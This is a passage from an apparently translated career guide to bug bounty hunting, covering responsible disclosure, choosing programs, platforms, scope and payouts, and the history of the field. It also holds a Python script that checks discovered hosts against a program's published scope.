2. Private Notification: The researcher informs the software vendor of the vulnerability through appropriate channels, providing comprehensive technical details and a proof of concept demonstrating the existence and impact of the flaw.

3. Grace Period: A reasonable period of time, agreed between the researcher and the vendor, is established for the latter to develop and rigorously test a patch to fix the vulnerability.

4. Coordinated Disclosure: Once the patch is available and has been deployed, the researcher and the vendor jointly disclose the vulnerability to the public. This disclosure includes detailed information about the vulnerability, its potential impact, and steps users can take to protect themselves, such as applying the patch or updating the software.

ARGENTINE TALENT
SANTIAGO LOPEZ IS A YOUNG ARGENTINE ETHICAL HACKER WHO BECAME A MILLIONAIRE BY FINDING AND REPORTING VULNERABILITIES IN COMPUTER SYSTEMS TO COMPANIES LIKE GOOGLE, ZOOM, VERIZON AND EVEN THE U.S. GOVERNMENT.

Benefits of Responsible Disclosure

- Protecting Users: Allowing vendors to address vulnerabilities before they are exploited significantly reduces the risk of attacks and safeguards users' security.

- Trust Building: Responsible disclosure demonstrates the commitment of researchers and companies to user security, building a relationship of trust and collaboration.

- Continuous Security Improvement: By working together, researchers and vendors can identify and fix vulnerabilities more efficiently, improving the overall security of software and systems.

- Recognition and Rewards: Many bug bounty programs recognize and financially reward researchers who responsibly disclose vulnerabilities, encouraging research and collaboration.

Bug Bounty Programs: A Key Incentive

Bug bounty programs are a powerful tool for encouraging responsible disclosure. These programs offer financial rewards to researchers who find and report vulnerabilities privately to companies. This not only incentivizes researchers to find and report flaws, but also ensures that vulnerabilities are addressed quickly and efficiently, protecting users and improving overall security.

It's Vital to Report Vulnerabilities to Bug Bounty Programs!

If you discover a vulnerability, it is crucial that you report it promptly to the appropriate bug bounty program. If the affected company has no program, use its vulnerability disclosure channel or security contact instead, and never test outside a program's stated scope. By reporting, you directly contribute to improving the security of the software and protect users from possible attacks. In addition, you may be rewarded for your valuable contribution.

Ethical Considerations and Challenges

Responsible disclosure is not without its challenges. Vendors can sometimes be slow to respond or reluctant to acknowledge vulnerabilities. There are also ethical dilemmas about when and how to disclose information that could be used for malicious purposes.

It is critical that researchers act with integrity and responsibility, always prioritizing the safety of users and avoiding causing unnecessary harm. Open and transparent communication with vendors is essential to build trusting relationships and achieve positive results.

How to Responsibly Report Vulnerabilities to Companies and Collaborate in their Solution

1. Identification and Analysis: Confirm the existence of the vulnerability and document all technical details, including steps to reproduce it, proofs of concept and possible solutions. Evaluate the potential impact of the vulnerability.

2. Private Notification: Use the company's official communication channels, such as its vulnerability disclosure program or bug bounty program, to report the vulnerability privately.

3. Clear and Concise Communication: Write a detailed and technical report that is still easy for the company's developers to understand. Include all the information necessary for them to reproduce and fix the vulnerability.

4. Collaboration: Maintain open and transparent communication with the company. Answer their questions, provide additional information if necessary and work together to find the best possible solution.

5. Coordinated Disclosure: Establish a reasonable timeline with the company for public disclosure of the vulnerability once it has been fixed. Prepare a public notice explaining the vulnerability and how users can protect themselves.

Responsible communication and disclosure of vulnerabilities, along with active participation in bug bounty programs, are indispensable tools for strengthening cybersecurity in an increasingly connected world. By working together, researchers, companies and the community can create a more secure and resilient digital environment, where vulnerabilities are addressed proactively and efficiently, protecting users and fostering innovation.

3.3 - BUILDING A CAREER IN BUG BOUNTY: FROM PASSION TO PROFESSION #3.3

The world of bug bounty programs offers an exciting opportunity to turn your passion for cybersecurity into a rewarding and lucrative career. This chapter will explore the key steps to building a successful career in this evolving field, from developing your technical skills to establishing your reputation and maximizing your income.

1. Develop Your Technical Skills:

- Master the Fundamentals: Start by acquiring a solid understanding of cybersecurity fundamentals, such as networks, operating systems, programming languages and web protocols.

- Specialize in Key Areas: Explore different areas of cybersecurity, such as penetration testing, vulnerability analysis, reverse engineering and web application security, to identify your areas of interest and specialization.

- Stay Current: Cybersecurity is a constantly evolving field. Spend time learning new techniques, tools and trends through online courses, conferences, blogs and security communities.

- Practice Consistently: Practice is key to honing your skills. Participate in ethical hacking platforms such as Hack The Box, TryHackMe and PortSwigger Web Security Academy to test your knowledge in secure and controlled environments.

2. Build your Reputation:

- Participate in Bug Bounty Programs: Start by participating in public and private bug bounty programs. Report your findings in a responsible and professional manner, following the disclosure guidelines of each program.

- Share your Knowledge: Write detailed reports on the vulnerabilities you discover, create educational content (blogs, videos, tutorials) and participate in online communities to share your knowledge and experiences.

- Build your Personal Brand: Create a personal website or blog to showcase your skills and accomplishments, and use social media to connect with other security professionals.

3. Maximize your Income:

- Focus on Profitable Programs: Research and select bug bounty programs that offer attractive rewards and fit your areas of expertise.

- Prioritize Quality over Quantity: Instead of reporting a large number of minor vulnerabilities, focus on finding critical, high-impact vulnerabilities that generate higher rewards.

- Negotiate your Rewards: Don't be afraid to negotiate with companies to get a fair reward for your findings. Research the usual pay ranges for each type of vulnerability.

- Diversify your Income: In addition to bug bounty, consider other sources of income such as security consulting, training, security tool development or content creation.

Santiago's Tips on How to Turn Your Passion for Security into a Successful Career:

- Be Curious and Persistent: Curiosity and persistence are essential to succeed in the bug bounty world. Never stop learning and exploring new areas of security.

- Be Ethical and Responsible: Always act with integrity and ethics. Report vulnerabilities responsibly and avoid causing unnecessary damage.

- Be Collaborative and Share your Knowledge: Collaborate with other researchers, share your knowledge and learn from others. The security community is a valuable resource for your professional growth.

- Be Patient and Persevering: Building a successful bug bounty career takes time and effort. Don't be discouraged by obstacles and keep working hard to achieve your goals.

Building a career in bug bounty requires dedication, passion and a constant commitment to learning and improvement. By following these tips and developing your skills, you can turn your passion for security into a rewarding career and contribute to a safer digital world.

136 MILLIONAIRE RECORDS


beyond T echnic 137
3.4 – BUG BOUNTY FUTURE #3.4

The cybersecurity landscape is constantly evolving, and with it, the world of bug bounty programs. This chapter explores the emerging trends that are shaping the future of this growing industry, as well as insights from Santiago Lopez, a renowned security expert and bounty hunter, on the challenges and opportunities ahead.

Emerging Trends in Bug Bounty

1. Automation and Machine Learning: Artificial intelligence and machine learning are transforming the way vulnerabilities are discovered and reported. Automated tools can scan large amounts of code for patterns and anomalies, speeding up the process of identifying vulnerabilities. However, the human touch is still essential to analyze and validate findings.

2. Focus on Supply Chain Security: As enterprises increasingly rely on third-party software and services, supply chain security becomes critical. Bug bounty programs are expanding their scope to include assessing the security of external suppliers and partners.

3. Bug Bounty in the Cloud: The widespread adoption of cloud computing has created new attack vectors and potential vulnerabilities. Bug bounty programs are adapting to address cloud-specific risks, such as misconfiguration of services, data exposure, and vulnerabilities in application programming interfaces (APIs).

4. Rewards for High-Impact Vulnerabilities: Enterprises are willing to pay higher rewards for critical vulnerabilities that could have a significant impact on their operations or the security of their customers. This incentivizes researchers to focus on finding high-risk vulnerabilities.

5. Gamification and Collaboration: Bug bounty programs are incorporating gamification elements, such as leaderboards and challenges, to motivate researchers and encourage healthy competition. In addition, collaborative platforms are being created that allow researchers to work together to discover and report vulnerabilities more efficiently.

Santiago's Reflections on the Future of the Industry

- The Rise of Specialization: As the threat landscape becomes more complex, security researchers are specializing in specific areas, such as mobile application security, cloud security, or IoT device security. This specialization allows for deeper analysis and identification of more sophisticated vulnerabilities.

- The Importance of Ethics: Ethics and responsibility are fundamental in the world of bug bounty. Researchers must act with integrity, respect the privacy of users and work collaboratively with companies to ensure that vulnerabilities are properly addressed.

- The Role of the Community: The security research community plays a crucial role in the evolution of bug bounty programs. Collaboration, knowledge sharing and mutual support are essential to the growth and success of this industry.

- The Challenge of Scale: As companies adopt bug bounty programs, the challenge lies in managing and scaling these programs effectively. Companies must establish clear processes, invest in automation tools and foster a culture of security to take full advantage of the benefits of bug bounty.

- The Future of Rewards: Financial rewards will continue to be an important incentive for researchers, but other forms of recognition will also be explored, such as prestige, the opportunity to collaborate with leading companies and access to exclusive resources.

The future of bug bounty programs is promising, with new trends emerging that are transforming the way companies approach security. Collaboration between researchers, companies and the community at large will be key to meeting the challenges and seizing the opportunities that lie ahead in this exciting field.
4
CHAPTER FOUR

LET'S GET TO WORK

CHOOSING THE RIGHT PROGRAM IS LIKE FINDING TREASURE: IT REQUIRES A LITTLE RESEARCH, INTUITION AND A LITTLE COURAGE. NOT EVERY PROGRAM WILL LOOK AMAZING TO YOU, SO LOOK FOR THE ONE THAT WILL MAKE YOU THE MOST MONEY.

"HOW TO CHOOSE THE RIGHT PROGRAM?"
4.1 – CHOOSING A BUG BOUNTY PROGRAM #4.1

In the vast universe of Bug Bounty programs, choosing the right one can be the difference between a rewarding experience and a frustrating one. This chapter will guide you through the key factors to consider when selecting a program, maximizing your chances of success and satisfaction.

1. Define your Objectives:

- What are you looking to achieve: do you want to earn money, gain experience, build your reputation, or contribute to the security of a specific project?

- What are your skills: Are you an expert in web security, mobile applications, cloud infrastructure or IoT devices?

- How much time can you dedicate: can you devote full time or just a few hours a week?

2. Research Available Programs:

- Bug Bounty Platforms: Explore platforms such as HackerOne, Bugcrowd, Intigriti and YesWeHack. These platforms offer a wide variety of programs from different companies and sectors.

- Private Programs: Some companies have private programs that are not listed on public platforms. Research companies that interest you and look for information about their Bug Bounty

let's get to work 143


programs on their websites or social media.

- Public Programs: Many programs are public and accessible to any researcher. These programs tend to be more competitive, but also offer the opportunity to earn recognition and significant rewards.

3. Evaluate Programs:

- Scope: What assets are included in the program: websites, mobile apps, APIs, cloud infrastructure?

- Rules: What are the program rules? What types of vulnerabilities are eligible for rewards? Are there restrictions on testing techniques?

- Rewards: What kind of rewards are offered: cash, swag, reputation points, public recognition? What is the range of rewards for different types of vulnerabilities?

- Communication: How does the company communicate with researchers? Is there a clear and transparent communication channel, and do they respond quickly to vulnerability reports?

- Reputation: What is the company's reputation in the Bug Bounty community? Do they pay rewards on time? Do they recognize the work of researchers?

4. Prioritize Programs:

- Alignment with your goals: Choose programs that align with your goals and skills. If you are a web security expert, look for programs that focus on web applications.

- Reward potential: Prioritize programs that offer attractive rewards and match your expectations.

- Communication and transparency: Choose programs that have good communication with researchers and are transparent about their rules and processes.

- Reputation: Prioritize programs from companies with a good reputation in the Bug Bounty community.

5. Start Looking for Vulnerabilities:

- Read the program documentation: Familiarize yourself with the program's rules, scope and rewards.

- Use appropriate tools and techniques: Use vulnerability scanning tools, fuzzers and other testing techniques to identify potential vulnerabilities.

- Report your findings responsibly: Follow the program's disclosure guidelines and report your findings clearly and concisely.

Additional Tips:

- Don't be discouraged: Finding vulnerabilities can be a long and tedious process. Don't give up if you don't find anything right away.

- Learn from your mistakes: If your reports are rejected, learn from your mistakes and improve your skills.

- Collaborate with other researchers: Working in a team can be a great way to learn and improve your skills.

- Keep up to date: Cybersecurity is constantly evolving. Stay up to date on the latest trends and techniques.

Choosing the right Bug Bounty program is a crucial step in building a successful career in this field. By following these tips, you can maximize your chances of success and contribute to a more secure digital environment.

4.2 – INDUSTRY HISTORY #4.2

From Early Steps to Professionalization

The concept of rewarding people for finding bugs in software is not new, but the bug bounty industry as we know it today has undergone a fascinating evolution over the decades. This chapter will take you on a journey through time, from the first informal programs to the professionalization and global recognition of this practice.

Early Origins: Pioneers and Experimenters

The idea of rewarding those who discover bugs in software dates back to the early days of computing. In the 1980s, companies such as Hunter & Ready offered rewards for finding


bugs in their VRTX operating system. However, these programs were informal and did not resemble the structured programs we know today.

In 1995, Netscape launched a bug bounty program for its Netscape Navigator 2.0 Beta browser, considered by many to be the first modern bug bounty program. This program offered cash rewards to those who found security vulnerabilities, setting a precedent for future initiatives.

The Rise of Bug Bounty: The Era of Professionalization

From the mid-2000s onwards, the bug bounty concept began to gain popularity. Companies such as Mozilla, Google and Microsoft launched their own programs, offering increasingly generous bounties for critical vulnerabilities.

In 2012, the HackerOne platform was founded, which revolutionized the industry by providing a centralized platform for companies to manage their bug bounty programs and for security researchers to find and report vulnerabilities. Other platforms such as Bugcrowd and Intigriti followed suit, creating a vibrant ecosystem for the bug bounty community.

Industry Maturity: Recognition and Growth

Over the past decade, the bug bounty industry has experienced exponential growth. More and more companies are recognizing the value of bug bounty as an effective way to improve the security of their products and services.

Bug bounty programs have expanded beyond software and now encompass a wide range of assets, from hardware and IoT devices to cloud infrastructure and industrial systems. Bounties have also increased significantly, with some companies offering millions of dollars for critical vulnerabilities.

The Future of Bug Bounty: Challenges and Opportunities

As the bug bounty industry continues to evolve, new challenges and opportunities arise. Automation and artificial intelligence are transforming the way vulnerabilities are discovered and reported, while the increasing complexity of systems and the proliferation of connected devices pose new risks and challenges.

Collaboration between companies, security researchers and governments will be essential to ensure that bug bounty programs remain effective and relevant in the future. Education and training will also play a crucial role in developing the next generation of cybersecurity talent.

The story is a testament to the power of collaboration and innovation in the quest for a more secure digital environment. From its humble beginnings to its current status as a recognized and valued practice, bug bounty has proven to be an invaluable tool for improving the security of our systems and protecting users from cyber threats. As we move into the future, the bug bounty industry will continue to play a crucial role in protecting our ever-evolving digital world.

4.3 – ASSETS #4.3

The types of assets you may encounter are as diverse as the vulnerabilities lurking in cyberspace. This chapter will take you on a tour of the different types of assets typically included in these programs, broadening your horizons and revealing a range of possibilities for your skills as a security researcher.

1. Web Applications:

Web applications are one of the most common targets in Bug Bounty programs. They range from simple informational websites to complex e-commerce and social networking platforms. The most frequent vulnerabilities in this area include:

- SQL Injection (SQLi): Allows attackers to manipulate SQL queries to access sensitive data or modify the database.
- Cross-Site Scripting (XSS): Allows malicious scripts to be injected into web pages and then executed in users' browsers.
- Cross-Site Request Forgery (CSRF): Forces authenticated users to perform unwanted actions in a web application.
- Authentication and Authorization Vulnerabilities: Allow attackers to bypass access controls and obtain unauthorized privileges.

2. Mobile Applications:

With the rise of mobile devices, mobile applications have become an attractive target for cybercriminals. Common vulnerabilities in this area include:

- Code Injection: Allows attackers to execute malicious code in the application.


- Insecure Data Storage: Exposes sensitive data, such as passwords or personal information, to potential attackers.
- Insecure Communication: Transmits sensitive data unencrypted, making it vulnerable to interception.
- Vulnerabilities in Third-Party Components: Libraries or frameworks used in the application may contain known vulnerabilities.

3. APIs (Application Programming Interfaces):

APIs are the glue that connects different applications and services. Common vulnerabilities in APIs include:

- Parameter Injection: Allows attackers to manipulate the parameters of API requests to access unauthorized data or perform unwanted actions.
- Weak Authentication and Authorization: Allows attackers to access protected resources without proper authorization.
- Excessive Data Exposure: Reveals sensitive information that is not necessary for API operation.
- Lack of Resource Control: Allows attackers to consume excessive resources and cause a denial of service.

4. Cloud Infrastructures:

The massive adoption of cloud computing has created new security challenges. Common vulnerabilities in cloud environments include:

- Misconfiguration of Cloud Services: Misconfiguration of firewalls, object storage or identity services can expose sensitive data or allow unauthorized access.
- Container Vulnerabilities: Containers, such as Docker, may contain vulnerabilities in the underlying software or be misconfigured.
- Denial of Service (DoS) Attacks: Attackers may attempt to overload cloud resources to disrupt services.

5. IoT Hardware and Devices:

The Internet of Things (IoT) has connected a wide range of devices to the Internet, from home appliances to medical devices. Common vulnerabilities in IoT hardware and devices include:

- Vulnerable Firmware: Outdated or poorly designed firmware can contain vulnerabilities that allow attackers to take control of the device.
- Weak or Hardcoded Credentials: Weak passwords, or credentials hardcoded into the firmware and shared by every unit, make unauthorized access to devices easy.
- Insecure Communication: Unencrypted data transmission between IoT devices and servers can expose sensitive information.

6. Other Assets:

In addition to those mentioned above, Bug Bounty programs may include other assets such as:

- Corporate Networks: Programs may include assessing the security of a company's internal network.
- Desktop Software: Desktop applications may also be subject to penetration testing for vulnerabilities.
- Custom Hardware Systems: Some companies develop hardware specific to their products or services, which may also be included in Bug Bounty programs.

The diversity of assets in Bug Bounty programs offers a wide range of opportunities for security researchers. By understanding the different types of assets and the vulnerabilities associated with each, you will be able to choose the programs that best suit your skills and interests, maximizing your chances of success and contributing to a more secure digital environment.
4.4 – PLATFORMS #4.4

Platforms play a key role as a meeting point between security researchers and companies looking to strengthen the protection of their digital assets. This chapter will immerse you in the fascinating universe of Bug Bounty Platforms, exploring


their features, benefits and how to make the most of them to boost your career as a bounty hunter.

What are Bug Bounty Platforms?

Bug Bounty platforms are websites or applications that act as intermediaries between companies offering bug bounty programs and security researchers looking to identify vulnerabilities. These platforms provide a structured and secure environment for collaboration, facilitating communication, reporting and bounty payment.

Key Features of Bug Bounty Platforms

1. Program Listings: The platforms offer a comprehensive directory of Bug Bounty programs from various companies and industries, allowing you to explore and choose those that align with your interests and skills.
2. Clear Guidelines and Rules: Each program has specific rules about what assets are in scope, what types of vulnerabilities are eligible for rewards and how they should be reported. The platforms ensure that these rules are clear and accessible to all participants.
3. Reporting System: The platforms provide a standardized system for submitting vulnerability reports, including technical details, proofs of concept and remediation recommendations. This facilitates communication between researchers and companies.
4. Reward Management: The platforms manage the payment of rewards to researchers, ensuring that they receive fair and timely compensation for their findings.
5. Leaderboards and Statistics: Many platforms offer leaderboards that show the most successful researchers, as well as statistics on programs and reported vulnerabilities. This encourages healthy competition and recognition of researchers.
6. Forums and Communities: Platforms often have online forums and communities where researchers can interact, share knowledge, ask questions and collaborate on finding vulnerabilities.

Benefits of Using Bug Bounty Platforms

- Access to a Wide Range of Programs: The platforms allow you to explore a wide variety of programs from different companies and industries, expanding your opportunities to find vulnerabilities and earn rewards.
- Clear Rules and Guidelines: The platforms ensure that the rules of each program are clear and transparent, avoiding misunderstandings and guaranteeing a fair experience for all participants.
- Efficient Reporting: The platforms' reporting system facilitates communication between researchers and companies, streamlining the vulnerability review and remediation process.
- Secure and Timely Reward Payment: The platforms manage reward payments, ensuring that researchers receive fair and timely compensation for their findings.
- Learning and Collaboration Opportunities: The platforms' forums and communities provide a space to interact with other researchers, share knowledge, and learn from the experiences of others.
- Recognition and Reputation: Participating in Bug Bounty programs across platforms allows you to build your reputation as a security researcher and gain recognition in the community.

Popular Bug Bounty Platforms

- HackerOne: One of the largest and most popular platforms, with a wide variety of programs from leading technology companies.
- Bugcrowd: Another major platform with a large community of researchers and an intuitive interface.
- Intigriti: A growing European platform with a focus on program quality and collaboration with researchers.
- YesWeHack: A platform with a strong presence in Europe and Asia, offering a wide range of security programs and services.

Tips for Getting the Most Out of Bug Bounty Platforms

- Research and Choose the Right Programs: Explore the program listings, read the rules and guidelines, and choose those that align with your interests and skills.
- Report Quality Vulnerabilities: Focus on finding significant, high-impact vulnerabilities and write clear, detailed reports that make understanding and remediation easy for the business.
- Be Professional and Collaborative: Maintain respectful and constructive communication with companies, and collaborate with them to address vulnerabilities efficiently.
- Participate in the Community: Join the platforms' forums and communities to interact with other researchers, share


knowledge and learn from others' experiences.

Bug Bounty platforms are a vibrant and constantly evolving ecosystem that offers unique opportunities for security researchers. By taking advantage of the features and benefits of these platforms, you can boost your Bug Bounty career, contribute to online security, and gain recognition for your skills and knowledge.

4.5 – SCOPE, PAYMENTS AND RESPONSE TIMES #4.5

Understanding scope, payouts and response times is crucial to maximizing your efforts and getting the most out of your participation. This chapter will guide you through these essentials, providing you with valuable information to make informed decisions and optimize your experience as a security researcher.

Scope: Defining the Boundaries of the Hunt

The scope of a Bug Bounty program clearly defines which assets are included in the program and therefore eligible for security testing and rewards. It is critical to understand the scope before you start looking for vulnerabilities, as this will help you focus your efforts in the right areas and avoid reporting issues that are outside the established boundaries. Testing outside the scope is not just unpaid work: it can amount to unauthorized access, so confirm any doubtful asset with the program before sending a single request to it.

Scopes can vary significantly between programs. Some programs may include a wide range of assets, such as web applications, mobile applications, APIs, cloud infrastructures and IoT devices. Other programs may have a more limited scope, focusing on specific assets or certain types of vulnerabilities.

When reviewing the scope of a program, pay attention to the following details:

- Assets included: What products, services or systems are included in the scope?
- Exclusions: Are there assets or types of vulnerabilities that are explicitly excluded from the program?
- Restrictions: Are there restrictions on allowable testing techniques?
- Disclosure requirements: How are you expected to report vulnerabilities found?

Payouts: Rewards for your Work

Payouts are the primary incentive for Bug Bounty researchers. Companies offer financial rewards for responsible vulnerability identification and reporting. Reward amounts can vary significantly depending on the severity of the vulnerability, the potential impact, and the company's reward policy.

When evaluating a program's payouts, consider the following factors:

- Reward structure: How are reward amounts determined? Are they based on the severity of the vulnerability, the potential impact, or a combination of both?
- Minimum and maximum: What is the minimum and maximum reward offered by the program?
- Bonuses: Are bonuses offered for finding especially critical vulnerabilities or for exceptional reporting?
- Payment methods: How are payments made: cash, gift cards, cryptocurrencies?
- Payment terms: How long does it usually take for the company to pay out rewards?

Response Times: The Importance of Communication

Response times refer to the time it takes for a company to respond to vulnerability reports. A quick response time is crucial to ensure that vulnerabilities are addressed in a timely manner and risk to users is minimized.

When evaluating a program's response times, consider the following aspects:

- Initial response time: How long does it take for the company to acknowledge receipt of a vulnerability report?
- Triage time: How long does it take the company to assess the severity of a vulnerability and assign it to a development team for remediation?
- Remediation time: How long does it take the company to develop and deploy a patch to address the vulnerability?
- Communication during the process: Does the company keep researchers informed about the progress of the remediation?
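As an added illustration of the scope checks discussed above (it is not code from the book or from any platform's tooling), the following Python script takes a program's inclusion and exclusion lists and filters a list of discovered hosts so that only in-scope targets get tested. The scope entries, the hostnames and the wildcard rule (`*.example.com` covers subdomains but not the apex domain) are assumptions modelled on common platform conventions; the program's own policy text always takes precedence.

```python
"""In-scope check for a list of candidate targets.

Added example for the scope discussion (not from the book or any platform).
The program scope and the discovered hosts below are constructed; real
programs publish their scope on the platform page, and exact wildcard
semantics vary, so treat this as a model, not a substitute for the policy.
"""
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class Scope:
    included: list[str] = field(default_factory=list)  # e.g. "*.example.com"
    excluded: list[str] = field(default_factory=list)  # exclusions win over inclusions


def _host_matches(pattern: str, host: str) -> bool:
    """Match a hostname against an exact name or a leading-wildcard pattern.

    Assumed convention: "*.example.com" covers any depth of subdomain
    (api.example.com, a.b.example.com) but not the apex example.com itself,
    so an apex that is in scope must be listed separately.
    """
    pattern, host = pattern.lower().rstrip("."), host.lower().rstrip(".")
    if pattern.startswith("*."):
        return host.endswith(pattern[1:]) and host != pattern[2:]
    return host == pattern


def hostname_of(target: str) -> str:
    """Accept a bare host, host:port or full URL and return the hostname."""
    if "://" not in target:
        target = "//" + target  # lets urlsplit parse a bare host
    host = urlsplit(target).hostname
    if not host:
        raise ValueError(f"cannot extract a hostname from {target!r}")
    return host


def in_scope(scope: Scope, target: str) -> bool:
    """True only if the host matches an inclusion and no exclusion."""
    host = hostname_of(target)
    if any(_host_matches(p, host) for p in scope.excluded):
        return False
    return any(_host_matches(p, host) for p in scope.included)


def filter_targets(scope: Scope, targets: list[str]) -> tuple[list[str], list[str]]:
    """Split discovered hosts (e.g. subdomain enumeration output) into
    (in_scope, out_of_scope) so nothing outside the policy gets tested."""
    allowed: list[str] = []
    rejected: list[str] = []
    for t in targets:
        (allowed if in_scope(scope, t) else rejected).append(t)
    return allowed, rejected


# Constructed program scope, in the shape platforms typically publish it.
EXAMPLE_SCOPE = Scope(
    included=["*.example.com", "example.com", "api.example-partner.net"],
    excluded=["legacy.example.com", "*.staging.example.com"],
)

# Constructed enumeration output: a mix of in-scope, excluded and
# look-alike hosts that a naive substring check would get wrong.
DISCOVERED = [
    "example.com",
    "https://api.example.com/v1/users",
    "legacy.example.com",
    "db1.staging.example.com",
    "api.example-partner.net",
    "www.example-partner.net",
    "notexample.com",
]

if __name__ == "__main__":
    ok, skip = filter_targets(EXAMPLE_SCOPE, DISCOVERED)
    print("in scope:    ", ok)
    print("out of scope:", skip)
```

Two details matter in practice: exclusions are checked first, so a host under `*.staging.example.com` stays out even though it also matches `*.example.com`; and matching is done on the full label boundary, so `notexample.com` is not accepted by `*.example.com` the way a plain `endswith("example.com")` would accept it.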


Tips for Choosing a Bug Bounty Program

- Align your skills and interests: Choose programs that focus on areas in which you have experience and expertise.
- Research the company's reputation: Look for information about the company's reputation in the Bug Bounty community. Do they pay rewards on time? Are they responsive to vulnerability reports?
- Read the rules and scope carefully: Make sure you understand the program rules and the scope of testing allowed.
- Evaluate rewards and response times: Consider whether the rewards offered are fair and if response times are reasonable.
- Look for programs with good communication: Choose programs that have a clear and transparent communication channel with researchers.

By understanding the scope, payouts and response times, you will be better prepared to choose the right Bug Bounty programs for you and maximize your chances of success. Remember, the key is to research, evaluate and choose wisely to find the programs that best suit your goals and skills.


4.6 – PRIVATE PROGRAMS #4.6

Private programs represent a higher level of collaboration and trust between companies and security researchers. This chapter will immerse you in the world of private programs, exploring their distinctive features, advantages and how to access them to take your Bug Bounty career to the next level.

What are Private Programs?

Unlike public programs, which are open to any researcher, private programs are by invitation only, extended to a select group of security experts. Companies carefully select researchers based on their experience, reputation and specialized skills.

Distinctive Features of Private Programs

1. Limited Access: Only invited researchers can participate in private programs. This creates a more controlled and focused environment where companies can work closely with trusted experts.
2. Increased Scope and Flexibility: Private programs typically have a broader scope than public programs, including critical and sensitive assets that are not publicly exposed. In addition, companies can be more flexible in terms of the rules and types of vulnerabilities they accept.
3. Higher Rewards: Due to the critical nature of the assets and the exclusivity of the programs, rewards in private programs are often significantly higher than in public programs.
4. Direct Communication: Researchers in private programs have direct access to corporate security teams, which facilitates communication and collaboration on vulnerability resolution.
5. Unique Learning Opportunities: Participating in private programs gives you the opportunity to work on challenging, high-impact projects, learn from industry experts and expand your knowledge and skills.

Advantages of Bug Bounty Private Programs

- Higher Rewards: The possibility of more substantial rewards is an attractive incentive for researchers looking to maximize their income.
- Greater Impact: By working on critical assets, your findings can have a significant impact on the security of the company and its users.
- Close Collaboration: Direct communication with enterprise security teams allows you to work as a team and learn from subject matter experts.
- Access to Exclusive Resources: In some cases, private programs offer researchers access to exclusive resources, such as testing environments, internal documentation and specialized tools.
- Recognition and Prestige: Being invited to a private program is recognition of your skills and experience, which can boost your career and open up new opportunities.

How to Access Private Programs

1. Build your Reputation: Actively participate in public programs, report quality vulnerabilities, create educational content and share your knowledge in the security community.
2. Make Connections: Attend security conferences, participate in industry events, and connect with other security researchers and practitioners.
3. Request Invitations: Some Bug Bounty platforms allow you to request invitations to private programs. You can also contact the companies you are interested in directly and express your interest in participating in their programs.
4. Demonstrate your Skills: When you are invited to a private program, be sure to demonstrate your skills and knowledge by reporting high quality vulnerabilities and collaborating effectively with the company.

Bug Bounty private programs offer a unique opportunity for security researchers looking for bigger challenges, higher rewards and closer collaboration with companies. By building your reputation, establishing connections and demonstrating your skills, you can open doors to this exclusive world and take your Bug Bounty career to the next level.

4.7 – THE "RIGHT PROGRAM" #4.7

Choosing the right program is crucial to maximizing your success and satisfaction as a security researcher. This chapter will guide you through the key factors to consider when selecting a program, giving you the tools you need to make informed and strategic decisions.


1. Define your Objectives and Priorities

Before diving into the program search, it is critical that you clearly define your goals and priorities. What are you looking to achieve through your participation in Bug Bounty? Do you want to earn money, gain experience, build your reputation, or contribute to the security of a specific project?

Also, consider your skills and areas of expertise: Are you an expert in web security, mobile applications, cloud infrastructure or IoT devices? Do you prefer to look for specific vulnerabilities, such as SQL injection or XSS?

Finally, evaluate how much time you can devote to bug hunting: can you devote full time or just a few hours a week?

2. Research Available Programs

Once you've defined your goals and priorities, it's time to research the Bug Bounty programs available. You can find programs on various platforms, such as HackerOne, Bugcrowd, Intigriti and YesWeHack. These platforms offer a wide variety of programs from different companies and industries, allowing you to explore and compare different options.

In addition to platforms, you can also research private programs that are not publicly listed. Some companies have in-house programs or work with private platforms to manage their Bug Bounty programs. You can find information about these programs on company websites, on social media or through contacts in the security community.

3. Evaluate Programs in Detail

When evaluating Bug Bounty programs, it is important to consider several key factors:

- Scope: What assets are included in the program: web apps, mobile apps, APIs, cloud infrastructure, IoT devices? Are there specific areas excluded from the scope?
- Rules: What are the program rules? What types of vulnerabilities are eligible for rewards? Are there restrictions on allowable testing techniques? What are the responsible disclosure policies?
- Payouts: What kind of rewards are offered: cash, swag, reputation points, public recognition? What is the range of rewards for different types of vulnerabilities? Is there a bonus program?
- Communication: How does the company communicate with researchers? Is there a clear and transparent communication channel? Do they respond quickly to vulnerability reports? Do they provide constructive feedback?
- Reputation: What is the company's reputation in the Bug Bounty community? Do they pay rewards on time? Do they recognize the work of researchers? Are they responsive to comments and suggestions?

4. Prioritize Programs that Align with Your Objectives

Once you've evaluated several programs, it's time to prioritize those that best align with your goals, skills, and time availability. Consider the following aspects:

- Alignment with your Interests and Skills: Choose programs that focus on areas in which you have experience and expertise. This will allow you to leverage your strengths and maximize your chances of success.
- Reward Potential: If your primary goal is to earn money, prioritize programs that offer attractive rewards and match your expectations.
- Communication and Transparency: If you value open and transparent communication, choose programs that have a good track record of communicating with researchers and are clear about their rules and processes.
- Reputation: If you are looking to build your reputation in the Bug Bounty community, choose programs from reputable companies that recognize the work of researchers.

5. Start Searching for Vulnerabilities

Once you've chosen a program, it's time to start looking for vulnerabilities. Read the program documentation carefully to familiarize yourself with the rules, scope and rewards. Use appropriate tools and techniques to identify potential vulnerabilities, and report your findings responsibly following the program's guidelines.

Additional Tips:

- Don't Limit Yourself to a Single Program: Participate in multiple programs to diversify your opportunities and learn from different companies and technologies.
- Be Persistent and Patient: Finding vulnerabilities can take time and effort. Don't get discouraged if you don't find anything right away.
- Learn from your Mistakes: If your reports are rejected, learn from the feedback and improve your skills.


- Collaborate with Other Researchers: Working in teams can be a great way to learn, share knowledge and increase your chances of success.
- Stay Current: Cybersecurity is constantly evolving. Stay up to date on the latest trends, techniques and tools to stay competitive.

Choosing the right Bug Bounty program is a crucial decision for your success as a security researcher. By defining your goals, researching available programs, carefully evaluating key factors and prioritizing the programs that best suit your needs, you'll be on the right path to building a rewarding career and contributing to a safer digital environment.

Here is a graphical comparison of the bounty tables of some of the most famous programs.

Some important notes about this comparison:

- Bounty amounts may vary: The figures shown are approximate and may change depending on the severity of the vulnerability and the policy of each program.
- Not all programs have the same categories: Some programs may have additional categories or different names for the same vulnerabilities.
- Company reputation is also important: In addition to rewards, consider the company's reputation in the Bug Bounty community, its payment history and its communication with researchers.

How to use this table?

This table can help you to:

- Compare rewards: See which programs offer the highest rewards for the types of vulnerabilities you are interested in.
- Choose programs: Select programs that match your skills and objectives.
- Negotiate rewards: Get an idea of the usual payout ranges for different vulnerabilities.

DETAILS THAT MAKE THE DIFFERENCE
